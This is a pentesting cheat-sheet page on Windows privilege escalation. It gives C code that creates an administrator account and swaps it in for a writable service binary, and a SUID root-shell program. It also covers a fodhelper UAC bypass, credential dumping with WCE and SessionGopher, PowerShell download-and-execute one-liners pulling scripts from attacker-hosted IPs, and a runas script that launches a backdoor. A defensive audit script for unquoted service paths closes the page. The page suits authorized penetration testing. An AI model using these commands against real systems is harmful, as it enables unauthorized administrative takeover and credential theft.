HackBook.io
  • Pentesting Pocket Book for hackers and developers.
Windows Escalation

Last updated 2 years ago

PowerUp is a good first hit for privesc

New user:

Imagine we have a program that runs a file with SYSTEM privileges, and the program lets us read and write that file. We can replace the file, relaunch the program, and get our new file executed:

>icacls ServiioService.exe //check the ACL: the file is writable to the NT Auth group

Make a C file called useradd.c:

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main(void)
{
    int i;
    /* create the user "evil" and add it to the local Administrators group */
    i = system("net user evil Ev!lpass /add");
    i = system("net localgroup administrators evil /add");
    return 0;
}

Then convert it to an exe and swap it in for the service binary:

> i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
> move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
> net stop Serviio
> wmic service where caption="Serviio" get name, caption, state, startmode
> shutdown /r /t 0
> net localgroup Administrators //should see our user "evil"

Batch scripts (.bat): This is a legacy Windows scripting language. It has since been overshadowed by VBS and PowerShell, but it still works just fine and is easy to use. A sample batch script to open cmd:

START cmd.exe

Learn more at: Batch Script Tutorial

Unquoted Paths: e.g. C:\Program Files\My Program\My Service\service.exe. Windows will attempt to run an executable from the following paths, in this order (any of the first three that we could create would be executed instead of the real service):

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

USBPcap:

>driverquery /v //shows USBPcap as a driver
# searchsploit USBPcap
C:\Program Files\USBPcap> type USBPcap.inf //check if the version matches searchsploit
//we then compile it for Windows and run it

Manual

System info (or sysinfo):

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

List Processes:

tasklist /SVC

Network Info:

ipconfig /all
route print
netstat -ano

Firewall:

netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Scheduled tasks:

schtasks /query /fo LIST /v

Installed apps and patch levels:

wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn

Read/write files:

accesschk.exe -uws "Everyone" "C:\Program Files"

powershell Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Mounted Disks:

mountvol

Driver enum:

powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Fast privesc checks (looking to see whether these are enabled, i.e. set to 1):

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Check enabled services:

net start

or

wmic service where 'Caption like "Remote%" and started=true' get Caption

reg query HKEY_CURRENT_USER\Software\Administrator\WinSCP

more

run file as another user

Run a file as another user with PowerShell (builds runas.ps1 line by line):

echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1

Service hijack

PowerUp and msf can do this, provided we can write to the service binary directory.

Adding Users/Groups

Adding a RDP group:

#net localgroup "Remote Desktop Users" <username> /add

Adding admin group:

#net localgroup "Administrators" <username> /add

Groups: TelnetClients, Remote Desktop Users, Administrators

Set User ID

#define _GNU_SOURCE   /* setresuid is a GNU extension on glibc */
#include <stdlib.h>   /* system */
#include <unistd.h>   /* setresuid */

int main(void)
{
    /* become root (only works when the binary is SUID root) */
    setresuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}

# Compile
gcc suid.c -o suid

Add user

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main(void)
{
    int i;
    /* <username> and <password> are placeholders: fill in before compiling */
    i = system("net user <username> <password> /add && net localgroup administrators <username> /add");
    return 0;
}

#Compile

i686-w64-mingw32-gcc -o useradd.exe useradd.c

Add a user: net user <username> <password> /add

Add a user to a group: #net localgroup "Remote Desktop Users" <username> /add

UAC Bypass

Going from an Admin user to a High Integrity Admin (able to run more commands without UAC stopping us):

//check current groups
>whoami /groups
//escalate, then check again
>powershell.exe Start-Process cmd.exe -Verb runAs

Windows 10 build 1709:

>C:\Windows\System32\fodhelper.exe
>cd C:\Tools\privilege_escalation\SysinternalsSuite
>sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe //check that autoelevate is set to true
//if so then look at pages 546-554

Pass hunting

wce:

Windows Credentials Editor (WCE) is a security tool that allows one to perform several attacks to obtain clear-text passwords and hashes from a compromised Windows host. Among other things, WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on the target system such as msv1_0.dll, kerberos.dll, and digest.dll.

C:\>wce -w

Session gopher:

A FireEye ps1 tool that searches a system for saved passwords and sessions (Telnet, WinSCP, RDP, etc.).

//download tool to kali

#wget https://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1

//Set up http server to transfer file and run it on remote target

#python -m SimpleHTTPServer 80

powershell.exe -nop -ep bypass -C iex (New-Object Net.Webclient).DownloadString('http://192.168.13.71/SessionGopher.ps1'); Invoke-SessionGopher -Thorough

PowerShell grab and run a ps1 file:

PS>IEX (New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/Sherlock.ps1')

or remotely (might have to URL-encode if you do it from the browser):

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://IP:80/ms16032.ps1')"

//great priv esc sheet (link at the end of this page)

Unquoted service path: If we see a job or command being used whose path is unquoted and has spaces, then we can place a file at an earlier candidate path and it gets grabbed first. ex:

c:\Program Files (x86)\Canon\IJ Scan Utility\SETEVENT.exe

We can then place our exploit as either Program.exe or IJ.exe.

Search for unquoted service paths:

>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
//manual check for an unquoted service path by checking the service itself
>sc qc <service name>
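As an added audit example (not code from the original page or from PowerUp), the unquoted-path logic from the Unquoted Paths section and the wmic search above, written in PowerShell for a defender auditing a host: it reports every service whose ImagePath is unquoted and contains spaces, the intermediate paths Windows would probe before the real binary, and the quoted ImagePath that closes the gap. The function names are chosen here, and the script assumes Get-CimInstance is available (PowerShell 3+).

```powershell
# Added audit example, not code from the original page or from PowerUp.
# Function names are chosen here; assumes Get-CimInstance (PowerShell 3+).

function Get-PathProbeCandidates {
    # Given an unquoted executable path with spaces, return the paths Windows
    # tries in order before the real binary (the path is split at each space).
    param([Parameter(Mandatory)][string]$ExePath)
    $parts = $ExePath -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    $candidates += $ExePath
    return $candidates
}

function Get-UnquotedServicePath {
    # Report services whose ImagePath is unquoted and contains a space,
    # with the probe candidates and the quoted path that removes the ambiguity.
    param([switch]$AutoStartOnly)
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }
        if ($AutoStartOnly -and $_.StartMode -ne 'Auto') { return }
        if ($path.TrimStart().StartsWith('"')) { return }   # already quoted
        # Split the binary from its arguments: everything up to the first ".exe".
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $path }
        if ($exe -notmatch ' ') { return }                   # no space, not affected
        [pscustomobject]@{
            Name       = $_.Name
            StartMode  = $_.StartMode
            ImagePath  = $path
            Candidates = Get-PathProbeCandidates -ExePath $exe
            # Remediation value: quote the executable part, keep the arguments.
            FixedPath  = '"' + $exe + '"' + $path.Substring($exe.Length)
        }
    }
}

# Audit run. To remediate a finding, write FixedPath back to the service's
# registry ImagePath, e.g.:
# Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\<Name>" ImagePath $fixed
Get-UnquotedServicePath -AutoStartOnly | Format-List Name, ImagePath, Candidates, FixedPath
```

For the page's own example, Get-PathProbeCandidates -ExePath 'C:\Program Files\My Program\My Service\service.exe' returns exactly the four paths listed in the Unquoted Paths section, in the same order.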

https://www.puckiestyle.nl/windows-privilege-escalation/